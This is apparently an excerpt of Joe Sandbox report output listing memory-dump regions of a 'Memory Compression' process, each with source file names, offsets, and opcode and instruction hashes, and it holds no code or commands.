                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d2141900eb8b8b6664a4c6184349780dd917c2fd82cb9134a17774575eeeadd3
                                      • Instruction ID: b13800c16eae74955ebd5a421b83f0a6c3d9d72580a59f3b392b098d0341d584
                                      • Opcode Fuzzy Hash: d2141900eb8b8b6664a4c6184349780dd917c2fd82cb9134a17774575eeeadd3
                                      • Instruction Fuzzy Hash: 01116D3091969E8EEB46EB6888582F97BE0FF19380F2404BAD419CB193DE355950C741
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 51ac02d9a3e7d407bb8edecaaabceca81e9f4670c9029850709944c5663bc905
                                      • Instruction ID: d3a7e0921eff941654752aff45893a782a8e585c622cc95a6c51c5de7a73fb11
                                      • Opcode Fuzzy Hash: 51ac02d9a3e7d407bb8edecaaabceca81e9f4670c9029850709944c5663bc905
                                      • Instruction Fuzzy Hash: 9911BFB0D0864E8FEB9AEB6484592BD7BE0FF18340F1405BAD409C7196DE79A840C711
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9254fd24f23655798321a4a90ffe21e6a81b9c711c58d3e9c5c4c303d0b84a28
                                      • Instruction ID: c5ecbe2b6d81e1d960187749b00d145eb1094f376f9a060be62a572f0e3b5308
                                      • Opcode Fuzzy Hash: 9254fd24f23655798321a4a90ffe21e6a81b9c711c58d3e9c5c4c303d0b84a28
                                      • Instruction Fuzzy Hash: 08119130D2C68A8FEB92EB78885D6B97BF0FF19340F1505B6D408C7192DE38A944C752
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b4eccbc431c172c2834cefac12feea39b984a90df09761d6f13a43a4d0a269cd
                                      • Instruction ID: e18293591f01626a7d6d31af936f6345091cc5a588abd35809b5f18412533ebc
                                      • Opcode Fuzzy Hash: b4eccbc431c172c2834cefac12feea39b984a90df09761d6f13a43a4d0a269cd
                                      • Instruction Fuzzy Hash: 9F117C70D1864E8FDB95EB6884592FD7BA0FF18344F1005BBD419C6291EA38A980C701
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cff408780adf127df91c6193e8d58fec8d1f08a0408e4dc2aa6310f5afd935d0
                                      • Instruction ID: 0f5111de2185882daf6057e0cd81626c50f586b17addb9c336315d40102b8f8b
                                      • Opcode Fuzzy Hash: cff408780adf127df91c6193e8d58fec8d1f08a0408e4dc2aa6310f5afd935d0
                                      • Instruction Fuzzy Hash: 9B115131D18A0E8AFB54EF68C855BEDB7A2FF54350F344279C409AB196CE386C42CB84
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 268cb3ee39c4ff38d90bbd9bf1392c2b4bad449db44293b7c006d5960cc37137
                                      • Instruction ID: e60a9487f11a3ac17851e2793b2576306752601e5e2143d114991a6ea37202ce
                                      • Opcode Fuzzy Hash: 268cb3ee39c4ff38d90bbd9bf1392c2b4bad449db44293b7c006d5960cc37137
                                      • Instruction Fuzzy Hash: 4311C170D18A8D8FEB49EB6488592B97BF2FF18340F1404BED40DC7192DF29A444C751
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b8e7c9564f9abe2a71743c289b56538c0592dd3826c1d260258d889bbd8cd2fc
                                      • Instruction ID: f197f3e689f187c72d874639106f08e71f9c5249baa06088c11becd8d1ab1044
                                      • Opcode Fuzzy Hash: b8e7c9564f9abe2a71743c289b56538c0592dd3826c1d260258d889bbd8cd2fc
                                      • Instruction Fuzzy Hash: DB115E7091864E8FEB44EB68C8596BA7BE0FF19305F5005BED41AC3192DB39A540C701
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9d54c8356531dda431d39f06a442a5a41131a4801049589573d73be3bfd3c11c
                                      • Instruction ID: ef0cc8907b0158ae975d814a5fe43dde63b9cf9091447aee640731d47cb1307b
                                      • Opcode Fuzzy Hash: 9d54c8356531dda431d39f06a442a5a41131a4801049589573d73be3bfd3c11c
                                      • Instruction Fuzzy Hash: 5F01BC30D5868A8FDB59EF64846A2B97BA0FF18340F2514BED40AC7092DE3AA940C741
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8e4ea50c7e6c4df1399d86e9abda16eb9f11eee09797f426451e8f08cb5c7ddb
                                      • Instruction ID: 5176c46ee86f2d019d7fc6e8d30061eb26997b6a67a5ce87ac2d3a1a3ad34aa1
                                      • Opcode Fuzzy Hash: 8e4ea50c7e6c4df1399d86e9abda16eb9f11eee09797f426451e8f08cb5c7ddb
                                      • Instruction Fuzzy Hash: 3F015E30A0890E8FEB99EF68C4556FA77A1FF58344F60457ED41EC7192CA36A950CB41
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6156d6b40f403d2a11ab4f6c4538e79f4e7e51c05c7b10b4bc1c0eb9dd692a61
                                      • Instruction ID: ee6fc7df1a39b80524cdb3bea0b1f7d513f9b79bf74a86ef74759bfaba89f3cf
                                      • Opcode Fuzzy Hash: 6156d6b40f403d2a11ab4f6c4538e79f4e7e51c05c7b10b4bc1c0eb9dd692a61
                                      • Instruction Fuzzy Hash: D4018F3091864E9FE752EB78C4496A97BE0FF1A340F5149B6D818C70A2EB38E444C601
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8c5903b85ac84e1f427ed9f85ca4f919abde2a5c12dd4e7ca94dbabfce5a8229
                                      • Instruction ID: 3b801a85e645cc39bccc50d0d9e0efc82d077335f7b1deebe67e4b7f1f82f0b3
                                      • Opcode Fuzzy Hash: 8c5903b85ac84e1f427ed9f85ca4f919abde2a5c12dd4e7ca94dbabfce5a8229
                                      • Instruction Fuzzy Hash: 8F11BE74E1895E9FEB94EB18C4557AAB3F1FF58341F5082AAC40DD3156DB34AD81CB40
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 37c7c4bc351c53d248a931d9a4cfd20d3e198659e63ba18ee39c63328f1b1261
                                      • Instruction ID: 0be01d13d938b19f629ed5ee48b775dec068cc3644002754587a029a9380f508
                                      • Opcode Fuzzy Hash: 37c7c4bc351c53d248a931d9a4cfd20d3e198659e63ba18ee39c63328f1b1261
                                      • Instruction Fuzzy Hash: 7A119670D1851D9EEBA5EB18C8557EDB6B2FF58340F6041BAD40DA6292DE38AE85CF00
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d062cd27e8194d0fc6d290e0bdd3d97bb48959854f6b8c3f4239c6fd3beb501e
                                      • Instruction ID: 9385d3df464d394acc12dfedcd9eb9577302f3769b96ec61be3e7e3e188ffc90
                                      • Opcode Fuzzy Hash: d062cd27e8194d0fc6d290e0bdd3d97bb48959854f6b8c3f4239c6fd3beb501e
                                      • Instruction Fuzzy Hash: 9B01F530D0D6898FDB4ADB6484692BE7BB0FF2A340F5504FEC44ACB092DE39A840C752
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4d3a5357c0ae6841256070d12a4e7722faff205036b5d743337042c2ee82ae7f
                                      • Instruction ID: 49ae81dfc0dab45bc542bfd8a63825ca00ee0e4df705451adb27efe5acdbf0ba
                                      • Opcode Fuzzy Hash: 4d3a5357c0ae6841256070d12a4e7722faff205036b5d743337042c2ee82ae7f
                                      • Instruction Fuzzy Hash: 9A015E3091891E8FEB84EFA8C4592BD77E5FF18384F20097AE81ED3192DE75A950C741
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4bac09f003946da5670d2bdc14cee15ad1f3e6d9279e53449faeed852259b4c9
                                      • Instruction ID: cb6c613c69de1a1fd4e950a743fad0072bf887ab0113596b6459cf5a79695f97
                                      • Opcode Fuzzy Hash: 4bac09f003946da5670d2bdc14cee15ad1f3e6d9279e53449faeed852259b4c9
                                      • Instruction Fuzzy Hash: EF017131D5D6894FE752AB78885A5A97BE0FF49340F1609F7D908CB0A3EA2CA884C701
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d84222dee40d710bd836b6aa5494e4c3c9c393c14f60b9dee7bb114dceea3e18
                                      • Instruction ID: a054a15ff066af728e3fd6cc5bdfdc2ee285dedc033bcba976c7649f8c09c664
                                      • Opcode Fuzzy Hash: d84222dee40d710bd836b6aa5494e4c3c9c393c14f60b9dee7bb114dceea3e18
                                      • Instruction Fuzzy Hash: 23112A75D0811ACEDB14EF69D4447FCB7B1FF14341F6041BAE019A6282DB385A84DF65
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6fd5b5af277883329eb2d28d2ac0dccdbccf7a19e244dbc70172607ea07f8040
                                      • Instruction ID: e17cd519c82e137246d77da288008320082d10a7c6f4a2746e85b8917aa0b010
                                      • Opcode Fuzzy Hash: 6fd5b5af277883329eb2d28d2ac0dccdbccf7a19e244dbc70172607ea07f8040
                                      • Instruction Fuzzy Hash: CD018B74D1864E8FEB91EB68848D7B97BE0FF59341F1545BAD808C60A2EA38E584C701
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 89600e140819627dbf9f9ef3072b6d41e855479af1d3a544dcffc8976317bf58
                                      • Instruction ID: 84957ea82c1636413e7efddbcd0efca31d3b5aab1338b0c1bc31f9916c3b03a2
                                      • Opcode Fuzzy Hash: 89600e140819627dbf9f9ef3072b6d41e855479af1d3a544dcffc8976317bf58
                                      • Instruction Fuzzy Hash: 12018430E1D68A8FEB52AB7884991A97BE4FF49340F1509F2D508CB0A2DA28A844C712
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5f3f46fab3c70bbb508f8835fe6f48e160c0ea0f280670cc5ccdf4d0fd465dae
                                      • Instruction ID: 127eb7fd8f26274b2e008ce58c64181bab20bc1ac3bbf0cefc3118cc3adf9237
                                      • Opcode Fuzzy Hash: 5f3f46fab3c70bbb508f8835fe6f48e160c0ea0f280670cc5ccdf4d0fd465dae
                                      • Instruction Fuzzy Hash: 3101D430D596498FDB88EB64C46D2BE7BA0FF49340F5404BED40ACA192DE39A950C711
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5f6824427eb6445b2cc83e6c7e7d5a380316475d761f082e1568c3768127ce77
                                      • Instruction ID: 8b43c301dc6a4a2be54fb2377534a597d30d0f24f5dc1dd013e5c7f92cd4178d
                                      • Opcode Fuzzy Hash: 5f6824427eb6445b2cc83e6c7e7d5a380316475d761f082e1568c3768127ce77
                                      • Instruction Fuzzy Hash: 7A01A27091D64A9FE742EB7888596A97BF1FF09380F5549F6D418C70A3FE38A944C702
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ebf77a157c3fd967808c5ec2d5da589520d56c2da0122e6399358fb0ed74d14f
                                      • Instruction ID: f9537640c1ba5231fe7ea78dd020ecf4bc2e522d31fa8ef322b43cf66f9b0f2d
                                      • Opcode Fuzzy Hash: ebf77a157c3fd967808c5ec2d5da589520d56c2da0122e6399358fb0ed74d14f
                                      • Instruction Fuzzy Hash: F501313091850EAFEB68EB68C4596B977E0FF18345F60087ED41EC61D2DE39A990C611
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 681ac945a8b7d5f5d612ee1aec1c76ced406da19b68eb68917d033ab7623fe85
                                      • Instruction ID: fee511ce182148a18523f624715144315859d11be7f51d6a3383cc8edf5ceb8d
                                      • Opcode Fuzzy Hash: 681ac945a8b7d5f5d612ee1aec1c76ced406da19b68eb68917d033ab7623fe85
                                      • Instruction Fuzzy Hash: 3901313095450EAEEBA8EB68C4592B977A0FF18345F60087ED41EC61D2DE39A550C641
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6c6a4bfa21efba8d892a5645607d555e8db41be121aa6e95a694f86249a75d86
                                      • Instruction ID: 2364dff17c4115067b9defa4c7d946857a07b779422368d4dd7f2d5055fcd815
                                      • Opcode Fuzzy Hash: 6c6a4bfa21efba8d892a5645607d555e8db41be121aa6e95a694f86249a75d86
                                      • Instruction Fuzzy Hash: 7B016D7091850E9EEB58EF2CC4692B977A0FF18341F2008BED40EC6092DE75AA50C701
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2c4270f17b4f72fb9dbb129ad3ba8183a422f9a69f02bdd7a4ff9d5402ab49b2
                                      • Instruction ID: e37c3e3672d302c4953097e265c8819e0362ae79edc24a60c63d11b92c9b4eb6
                                      • Opcode Fuzzy Hash: 2c4270f17b4f72fb9dbb129ad3ba8183a422f9a69f02bdd7a4ff9d5402ab49b2
                                      • Instruction Fuzzy Hash: 76F0AF70D18A1E8AFB989BAC98583FA77E0FF66391F10067AD41AC61C2DE241958C641
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f2680e9ceead2dd6da9956ebc38fbdcea20664178861da4a554842086d7e9697
                                      • Instruction ID: ac2eddc4b8ff406a66cb308c23fdc74372f9d81608dfca3c08be9bd9eb3c42f2
                                      • Opcode Fuzzy Hash: f2680e9ceead2dd6da9956ebc38fbdcea20664178861da4a554842086d7e9697
                                      • Instruction Fuzzy Hash: 7FF08C30909A4E8FEB99DF288859AFA77A0FF55345F60057AE819C6192CB39E850CB40
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7214c3f7d6f5d0f85af5dca6042705bda55a6047fc2d0494f3bd88aad50f7e0a
                                      • Instruction ID: ca48122b1390b52945c1789a1819928d9b5d92e7ca45aa80b3900dcdcee6dce0
                                      • Opcode Fuzzy Hash: 7214c3f7d6f5d0f85af5dca6042705bda55a6047fc2d0494f3bd88aad50f7e0a
                                      • Instruction Fuzzy Hash: 530144B0E1891E9EE741EB7CC44D6BA76E2FF58345F6048B5D41DC7196EE38B484CA01
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ee1c9facee2ca88b6342a3bc7bc2027584646fd8ac8858cc634ca9f14832eb1b
                                      • Instruction ID: 5e57666e62cd18069597734d40642dcf2900f3be3e3a7b92e3163f2918a05a37
                                      • Opcode Fuzzy Hash: ee1c9facee2ca88b6342a3bc7bc2027584646fd8ac8858cc634ca9f14832eb1b
                                      • Instruction Fuzzy Hash: ABF0F03091960E8FEB99EF2894452FA37A0FF15344F60053AE80DC7182CB39E8A0CB81
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7566a65ce41940427387955aac0e7f139b0b57692203b0081528a46e4fe278d0
                                      • Instruction ID: 9bbe1458e246601564384d4c373760fb14b0c89b9f9084aabf967dca4402890d
                                      • Opcode Fuzzy Hash: 7566a65ce41940427387955aac0e7f139b0b57692203b0081528a46e4fe278d0
                                      • Instruction Fuzzy Hash: D901EE74D0861A8FEF64EF94D4946ECBAB1FB18361F24016ED009E2291DB386988CB25
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c9ea8180432437446478f9baa514fd6347778686a6304b6c3dd51d474ca2729f
                                      • Instruction ID: 7546c906aad585d8a0dd0a21b8e2f18813a0a0b07e88956874a77f18f9b87990
                                      • Opcode Fuzzy Hash: c9ea8180432437446478f9baa514fd6347778686a6304b6c3dd51d474ca2729f
                                      • Instruction Fuzzy Hash: ABF0C83180D3899FDB659F2484252A93B60FF05340F5504BED449C60D3DA3C9854C741
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0447b79281b8074d6891f04e342cdbdd5c91919d66f0023f7fd0fc0590156aa2
                                      • Instruction ID: 7b5797627245b8f1c101049567410d2467ae9a3eda0377c8cae0442e7d02e34e
                                      • Opcode Fuzzy Hash: 0447b79281b8074d6891f04e342cdbdd5c91919d66f0023f7fd0fc0590156aa2
                                      • Instruction Fuzzy Hash: 6CF0FE70D1455E8EEB94EF6898182FE77A4FF18305F50053BE81DC2291EB345594C651
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5c9a1f98ac24e19ba2e3ae15f3eeaba662ed23d5093254c6ab9e1cd6f403daeb
                                      • Instruction ID: 40327963e551d2ddae569dbefb565386d5602c8fadc95ba7007732e15d1d72e1
                                      • Opcode Fuzzy Hash: 5c9a1f98ac24e19ba2e3ae15f3eeaba662ed23d5093254c6ab9e1cd6f403daeb
                                      • Instruction Fuzzy Hash: 0BF0243081E78A8FEB689F28842A2B93BA0FF05314F0404BEE509C60D3DB3D9850C301
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1c3793899e74988778d620f26c1e6b94808694aef74b3bdca11a110d8a4c849c
                                      • Instruction ID: 805c8ac2244c1e409037d90ecea76f7b85daba154eb5b6794332551378a9b6a6
                                      • Opcode Fuzzy Hash: 1c3793899e74988778d620f26c1e6b94808694aef74b3bdca11a110d8a4c849c
                                      • Instruction Fuzzy Hash: EBD012B0C0862D8BDF00DFA0CC10AEE73B1BF10340F000566900AAB2C5CBB86948CB51
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: !$"$#$+$-$/$[${$}
                                      • API String ID: 0-3989209503
                                      • Opcode ID: 6d69f1c575fa24a89efaa86438dd4f00321fa4af7925690356c0dd8bd8ebce08
                                      • Instruction ID: 38bf1e27ccb928f26d741cd526bd30adfa94575ddc1e5a897dc569b4052b0e2a
                                      • Opcode Fuzzy Hash: 6d69f1c575fa24a89efaa86438dd4f00321fa4af7925690356c0dd8bd8ebce08
                                      • Instruction Fuzzy Hash: F1B1C370D082298FEBA8DF54D8987EDB7B1BF49341F2045B9D04EA6281CB386E85CF51